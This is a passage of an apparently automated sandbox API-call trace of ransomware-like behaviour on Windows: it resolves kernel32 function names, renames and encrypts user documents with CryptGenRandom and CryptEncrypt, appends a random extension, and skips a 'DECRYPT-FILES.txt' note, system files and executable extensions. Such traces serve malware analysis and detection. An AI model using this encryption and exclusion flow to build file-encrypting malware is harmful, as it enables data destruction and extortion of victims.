returned="DeleteTimerQueueTimer" [0083.850] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.850] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.850] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.850] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.850] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.850] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.850] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.850] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.850] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.851] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.851] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.851] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.851] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.851] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.851] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.851] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.851] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.851] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.851] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.851] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.851] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.851] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.851] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.851] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.851] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.851] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.851] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.851] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.851] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.852] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.852] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.852] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.852] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.852] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp") returned 77 [0083.852] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp.YP1CLFf") returned 85 [0083.852] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\dzdoybfovdeubph.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp.YP1CLFf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\dzdoybfovdeubph.odp.yp1clff"), dwFlags=0x0) returned 1 [0083.855] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.855] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.855] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.855] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1388b720, ftCreationTime.dwHighDateTime=0x1d4ca23, ftLastAccessTime.dwLowDateTime=0x359d5b50, ftLastAccessTime.dwHighDateTime=0x1d4d23d, ftLastWriteTime.dwLowDateTime=0x359d5b50, ftLastWriteTime.dwHighDateTime=0x1d4d23d, nFileSizeHigh=0x0, nFileSizeLow=0x19b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gtXCw8YOfxeWSlrp.xls", cAlternateFileName="GTXCW8~1.XLS")) returned 1 [0083.855] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="DECRYPT-FILES.txt") returned 1 [0083.855] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="autorun.inf") returned 1 [0083.855] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="boot.ini") returned 1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="desktop.ini") returned 1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="ntuser.dat") returned -1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="iconcache.db") returned -1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="bootsect.bak") returned 1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="ntuser.dat.log") returned -1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="thumbs.db") returned -1 [0083.856] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls", lpString2="Bootfont.bin") returned 1 [0083.856] lstrlenW (lpString="gtXCw8YOfxeWSlrp.xls") returned 20 [0083.856] lstrcmpiW (lpString1="xls", lpString2="lnk") returned 1 [0083.856] lstrcmpiW (lpString1="xls", lpString2="exe") returned 1 [0083.856] lstrcmpiW (lpString1="xls", lpString2="sys") returned 1 [0083.856] lstrcmpiW (lpString1="xls", lpString2="dll") returned 1 [0083.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.856] lstrlenW (lpString="gtXCw8YOfxeWSlrp.xls") returned 20 [0083.856] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.856] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="gtXCw8YOfxeWSlrp.xls" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls" [0083.856] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\gtxcw8yofxewslrp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.856] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=6577) returned 1 [0083.856] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.856] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.857] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.857] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.857] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.857] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.857] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.858] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.858] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.858] CloseHandle (hObject=0x42c) returned 1 [0083.858] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.858] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.859] CloseHandle (hObject=0x0) returned 0 [0083.859] CloseHandle (hObject=0x428) returned 1 [0083.859] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.859] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.859] GetTickCount () returned 0x114d6df [0083.860] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.860] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.860] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.860] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.860] lstrlenA (lpString="kernel32.dll") returned 12 [0083.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.860] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.861] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.861] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.861] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.861] lstrlenA (lpString="ADDATOMA") returned 8 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.861] lstrlenA (lpString="ADDATOMW") returned 8 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.861] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.861] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.861] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.861] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.861] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.861] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.861] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.861] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.861] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.861] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.861] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.861] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.861] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.861] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.861] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.862] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.862] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.862] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.862] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.862] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.862] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.862] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.862] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.862] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.862] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.862] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.862] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.863] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.863] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.863] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.863] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.863] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.863] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.863] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.863] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.863] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.863] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.863] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.863] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.863] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.863] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.863] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.863] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.863] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.863] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.863] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.864] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.864] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.864] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.864] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.864] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, 